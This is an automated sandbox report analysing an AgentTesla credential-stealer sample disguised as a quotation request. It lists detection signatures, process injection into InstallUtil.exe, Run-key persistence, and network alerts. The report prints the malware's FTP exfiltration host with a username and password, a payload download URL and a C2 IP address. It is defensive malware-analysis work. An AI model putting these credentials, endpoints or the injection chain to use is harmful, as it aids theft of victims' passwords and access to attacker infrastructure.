Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Request for Quotation-537262227-04.exe

Overview

General Information

Sample name:Request for Quotation-537262227-04.exe
Analysis ID:1530631
MD5:914f3a5bdb348b468c12c2eb6233cebf
SHA1:f8ee41c3c699c5b80b3614e92ff4f86904b58d84
SHA256:3d3bb35b07c7936e701822fdb9e243d70cc00b46762583b865a4a137ffa5f49e
Tags:exeuser-lowmal3
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Request for Quotation-537262227-04.exe (PID: 6160 cmdline: "C:\Users\user\Desktop\Request for Quotation-537262227-04.exe" MD5: 914F3A5BDB348B468C12C2EB6233CEBF)
    • InstallUtil.exe (PID: 7108 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Oltpxw.exe (PID: 2516 cmdline: "C:\Users\user\AppData\Roaming\Oltpxw.exe" MD5: 914F3A5BDB348B468C12C2EB6233CEBF)
    • InstallUtil.exe (PID: 2172 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Oltpxw.exe (PID: 1524 cmdline: "C:\Users\user\AppData\Roaming\Oltpxw.exe" MD5: 914F3A5BDB348B468C12C2EB6233CEBF)
    • InstallUtil.exe (PID: 5456 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000002.2323828873.000000000295E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000006.00000002.2426055475.0000000002F8F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000006.00000002.2426055475.0000000002F8F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000000.00000002.2169044040.000000000392A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000002.2169044040.000000000392A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 43 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.Request for Quotation-537262227-04.exe.62b0000.10.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                4.2.Oltpxw.exe.3b97470.2.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  4.2.Oltpxw.exe.3b97470.2.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    4.2.Oltpxw.exe.3b97470.2.raw.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x33061:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x330d3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x3315d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x331ef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x33259:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x332cb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x33361:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x333f1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    4.2.Oltpxw.exe.3b97470.2.raw.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                    • 0x3047c:$s2: GetPrivateProfileString
                    • 0x2fb9d:$s3: get_OSFullName
                    • 0x3118e:$s5: remove_Key
                    • 0x3136c:$s5: remove_Key
                    • 0x3227a:$s6: FtpWebRequest
                    • 0x33043:$s7: logins
                    • 0x335b5:$s7: logins
                    • 0x362ba:$s7: logins
                    • 0x36378:$s7: logins
                    • 0x37c7e:$s7: logins
                    • 0x36f1c:$s9: 1.85 (Hash, version 2, native byte-order)
                    Click to see the 16 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Oltpxw.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Request for Quotation-537262227-04.exe, ProcessId: 6160, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Oltpxw

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-10T10:00:05.772082+020020299271A Network Trojan was detected192.168.2.5497055.2.84.23621TCP
                    2024-10-10T10:00:19.864118+020020299271A Network Trojan was detected192.168.2.5497645.2.84.23621TCP
                    2024-10-10T10:00:30.081107+020020299271A Network Trojan was detected192.168.2.5498125.2.84.23621TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-10T10:00:06.388590+020028555421A Network Trojan was detected192.168.2.5497065.2.84.23650955TCP
                    2024-10-10T10:00:06.394184+020028555421A Network Trojan was detected192.168.2.5497065.2.84.23650955TCP
                    2024-10-10T10:00:20.477636+020028555421A Network Trojan was detected192.168.2.5497795.2.84.23664433TCP
                    2024-10-10T10:00:20.483793+020028555421A Network Trojan was detected192.168.2.5497795.2.84.23664433TCP
                    2024-10-10T10:00:30.699366+020028555421A Network Trojan was detected192.168.2.5498265.2.84.23664850TCP
                    2024-10-10T10:00:30.704521+020028555421A Network Trojan was detected192.168.2.5498265.2.84.23664850TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 2.2.InstallUtil.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeReversingLabs: Detection: 18%
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeVirustotal: Detection: 13%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: Request for Quotation-537262227-04.exeReversingLabs: Detection: 18%
                    Source: Request for Quotation-537262227-04.exeVirustotal: Detection: 13%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: Request for Quotation-537262227-04.exeJoe Sandbox ML: detected
                    Source: Request for Quotation-537262227-04.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.5:49704 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.5:49728 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.5:49782 version: TLS 1.2
                    Source: Request for Quotation-537262227-04.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Request for Quotation-537262227-04.exe, 00000000.00000002.2156575448.000000000298A000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2177410373.0000000006430000.00000004.08000000.00040000.00000000.sdmp, Oltpxw.exe, 00000004.00000002.2322212414.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000006.00000002.2426055475.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Request for Quotation-537262227-04.exe, 00000000.00000002.2156575448.000000000298A000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2177410373.0000000006430000.00000004.08000000.00040000.00000000.sdmp, Oltpxw.exe, 00000004.00000002.2322212414.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000006.00000002.2426055475.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2176585974.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.0000000003A76000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2176585974.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.0000000003A76000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 4x nop then jmp 0637A490h0_2_0637A290
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 4x nop then jmp 0637A490h0_2_0637A280
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 4x nop then jmp 063C8D2Bh0_2_063C8AF8
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 4x nop then jmp 063C8D2Bh0_2_063C89E0
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 4x nop then jmp 063C8D2Bh0_2_063C89D6
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4x nop then jmp 0651A490h4_2_0651A290
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4x nop then jmp 0651A490h4_2_0651A280
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4x nop then jmp 06568D2Bh4_2_06568AF8
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4x nop then jmp 06568D2Bh4_2_065689D6
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4x nop then jmp 06568D2Bh4_2_065689E0
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4x nop then jmp 0696A490h6_2_0696A290
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4x nop then jmp 0696A490h6_2_0696A280
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4x nop then jmp 069B8D2Bh6_2_069B8AF8
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4x nop then jmp 069B8D2Bh6_2_069B89D7
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4x nop then jmp 069B8D2Bh6_2_069B89E0

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49705 -> 5.2.84.236:21
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49779 -> 5.2.84.236:64433
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49764 -> 5.2.84.236:21
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49706 -> 5.2.84.236:50955
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49826 -> 5.2.84.236:64850
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49812 -> 5.2.84.236:21
                    Connects to many ports of the same IP (likely port scanning)
                    Source: global trafficTCP traffic: 5.2.84.236 ports 64850,64433,1,2,21,50955
                    Source: global trafficTCP traffic: 192.168.2.5:49706 -> 5.2.84.236:50955
                    Source: global trafficHTTP traffic detected: GET /ikeawc/Arnke.pdf HTTP/1.1Host: rubberpartsmanufacturers.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /ikeawc/Arnke.pdf HTTP/1.1Host: rubberpartsmanufacturers.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /ikeawc/Arnke.pdf HTTP/1.1Host: rubberpartsmanufacturers.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 5.2.84.236 5.2.84.236
                    Source: Joe Sandbox ViewASN Name: ALASTYRTR ALASTYRTR
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownFTP traffic detected: 5.2.84.236:21 -> 192.168.2.5:49705 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:00. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:00. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:00. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 100 allowed.220-Local time is now 11:00. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /ikeawc/Arnke.pdf HTTP/1.1Host: rubberpartsmanufacturers.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /ikeawc/Arnke.pdf HTTP/1.1Host: rubberpartsmanufacturers.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /ikeawc/Arnke.pdf HTTP/1.1Host: rubberpartsmanufacturers.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: rubberpartsmanufacturers.com
                    Source: global trafficDNS traffic detected: DNS query: ftp.alternatifplastik.com
                    Source: InstallUtil.exe, 00000002.00000002.2323828873.000000000295E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2323828873.000000000296C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2422576609.0000000002AEE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2422576609.0000000002AFC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3367618614.000000000266C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3367618614.000000000265E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.alternatifplastik.com
                    Source: Request for Quotation-537262227-04.exe, 00000000.00000002.2156575448.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2323828873.000000000295E000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000004.00000002.2322212414.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2422576609.0000000002AEE000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000006.00000002.2426055475.0000000002D8C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3367618614.000000000265E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.000000000392A000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2156575448.0000000002A3F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2317429838.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Oltpxw.exe, 00000004.00000002.2344463133.0000000003B97000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000004.00000002.2322212414.0000000002CBC000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000004.00000002.2344463133.0000000003C33000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000006.00000002.2426055475.0000000002F8F000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000006.00000002.2450097423.0000000003F72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2176585974.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.0000000003A76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2176585974.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000004.00000002.2344463133.0000000003E2E000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000006.00000002.2450097423.000000000416E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2176585974.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.0000000003A76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: Request for Quotation-537262227-04.exe, 00000000.00000002.2156575448.00000000027C1000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000004.00000002.2322212414.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000006.00000002.2426055475.0000000002D8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rubberpartsmanufacturers.com
                    Source: Request for Quotation-537262227-04.exe, Oltpxw.exe.0.drString found in binary or memory: https://rubberpartsmanufacturers.com/ikeawc/Arnke.pdf
                    Source: Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2176585974.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.0000000003A76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2176585974.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2156575448.000000000280A000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000004.00000002.2322212414.0000000002A8A000.00000004.00000800.00020000.00000000.sdmp, Oltpxw.exe, 00000006.00000002.2426055475.0000000002E30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2176585974.00000000061E0000.00000004.08000000.00040000.00000000.sdmp, Request for Quotation-537262227-04.exe, 00000000.00000002.2169044040.0000000003A76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                    Source: unknownHTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.5:49704 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.5:49728 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 103.191.208.122:443 -> 192.168.2.5:49782 version: TLS 1.2

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 4.2.Oltpxw.exe.3b97470.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 4.2.Oltpxw.exe.3b97470.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.Request for Quotation-537262227-04.exe.392a7d0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Request for Quotation-537262227-04.exe.392a7d0.4.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 4.2.Oltpxw.exe.3b97470.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 4.2.Oltpxw.exe.3b97470.2.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.Request for Quotation-537262227-04.exe.392a7d0.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Request for Quotation-537262227-04.exe.392a7d0.4.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: Request for Quotation-537262227-04.exe
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_063C4EE8 NtProtectVirtualMemory,0_2_063C4EE8
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_063C5FD0 NtResumeThread,0_2_063C5FD0
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_063C4EE0 NtProtectVirtualMemory,0_2_063C4EE0
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_063C5FC8 NtResumeThread,0_2_063C5FC8
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_06564EE8 NtProtectVirtualMemory,4_2_06564EE8
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_06565FD0 NtResumeThread,4_2_06565FD0
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_06564EE0 NtProtectVirtualMemory,4_2_06564EE0
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 4_2_06565FC8 NtResumeThread,4_2_06565FC8
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_069B4EE8 NtProtectVirtualMemory,6_2_069B4EE8
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_069B5FD0 NtResumeThread,6_2_069B5FD0
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_069B4EE0 NtProtectVirtualMemory,6_2_069B4EE0
                    Source: C:\Users\user\AppData\Roaming\Oltpxw.exeCode function: 6_2_069B5FC8 NtResumeThread,6_2_069B5FC8
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0272CEE40_2_0272CEE4
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0623BF580_2_0623BF58
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0623142C0_2_0623142C
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0623CC080_2_0623CC08
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_062300400_2_06230040
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0623462D0_2_0623462D
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0623463D0_2_0623463D
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0623BF490_2_0623BF49
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0623B7A80_2_0623B7A8
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0623B7980_2_0623B798
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_06235FE00_2_06235FE0
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_06235FF00_2_06235FF0
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0623CBF80_2_0623CBF8
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0623003F0_2_0623003F
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0637BF000_2_0637BF00
                    Source: C:\Users\user\Desktop\Request for Quotation-537262227-04.exeCode function: 0_2_0637F7A00_2_0637F7A0
